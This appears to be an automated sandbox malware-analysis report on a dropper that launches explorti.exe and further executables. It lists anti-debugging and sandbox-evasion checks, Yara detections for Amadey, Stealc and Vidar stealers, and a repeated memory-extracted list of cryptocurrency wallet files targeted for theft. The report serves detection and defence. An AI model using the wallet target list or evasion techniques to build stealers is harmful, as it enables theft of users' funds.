Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_054E0621 Start: 054E0A73 End: 054E05E9 6_2_054E0621
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: NTICE
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: SICE
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054E0C1C rdtsc 0_2_054E0C1C
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C935FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 7_2_6C935FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8D3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 7_2_6C8D3480
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B2645B mov eax, dword ptr fs:[00000030h] 6_2_00B2645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B2A1C2 mov eax, dword ptr fs:[00000030h] 6_2_00B2A1C2
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C90B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_6C90B66C
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C90B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6C90B1F7
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CABAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6CABAC62
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 53c7d901f1.exe PID: 7996, type: MEMORYSTR
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe "C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe "C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe "C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB04760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 7_2_6CB04760
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 7_2_6C9E1C30
Source: 8eb30d7f71.exe, 00000009.00000002.2880216454.00000000005D2000.00000002.00000001.01000000.0000000B.sdmp, 8eb30d7f71.exe.6.dr, random[1].exe0.6.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: eb98fe5174.exe, eb98fe5174.exe, 00000007.00000002.2620268585.0000000000A2C000.00000040.00000001.01000000.00000009.sdmp, 53c7d901f1.exe, 00000008.00000002.2648279906.000000000085C000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: \Program Manager
Source: explorti.exe, explorti.exe, 00000006.00000002.2880337631.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: "Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B0D312 cpuid 6_2_00B0D312
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B0CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00B0CB1A
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00AF65B0 LookupAccountNameA, 6_2_00AF65B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA08390 NSS_GetVersion, 7_2_6CA08390

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 1.2.explorti.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorti.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorti.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1731310939.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1724434181.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1644028798.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1725167725.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2316417057.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1765635278.0000000000AF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1764804694.0000000000AF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2880125068.0000000000AF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 53c7d901f1.exe PID: 7996, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1731373345.0000000000CE5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: ^jaxxy
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
